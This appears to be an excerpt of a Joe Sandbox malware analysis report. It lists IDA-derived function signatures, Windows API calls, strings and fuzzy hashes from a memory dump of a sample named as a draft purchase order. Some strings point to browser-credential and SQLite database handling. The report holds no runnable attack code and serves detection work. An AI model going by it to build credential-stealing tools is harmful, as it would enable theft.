                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                • API String ID: 2767993716-572158859
                                                                                • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                APIs
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 3176057301-2039793938
                                                                                • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                APIs
                                                                                Strings
                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                • database is already attached, xrefs: 0042F721
                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                • out of memory, xrefs: 0042F865
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                • API String ID: 1297977491-2001300268
                                                                                • Opcode ID: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                • Opcode Fuzzy Hash: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                APIs
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                • String ID: ($d
                                                                                • API String ID: 1140211610-1915259565
                                                                                • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                APIs
                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                • String ID:
                                                                                • API String ID: 3015003838-0
                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00407E44
                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                • String ID:
                                                                                • API String ID: 59245283-0
                                                                                • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                • free.MSVCRT ref: 004185AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                • String ID:
                                                                                • API String ID: 2802642348-0
                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                APIs
                                                                                • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                • API String ID: 3510742995-3273207271
                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                • String ID: 3A
                                                                                • API String ID: 3300951397-293699754
                                                                                • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                • String ID: strings
                                                                                • API String ID: 3166385802-3030018805
                                                                                • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                • String ID: AE$.cfg$General$EA
                                                                                • API String ID: 776488737-1622828088
                                                                                • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                • memset.MSVCRT ref: 0040D906
                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                • String ID: sysdatetimepick32
                                                                                • API String ID: 1028950076-4169760276
                                                                                • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: -journal$-wal
                                                                                • API String ID: 438689982-2894717839
                                                                                • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Dialog$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3975816621-0
                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                APIs
                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                • API String ID: 1214746602-2708368587
                                                                                • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
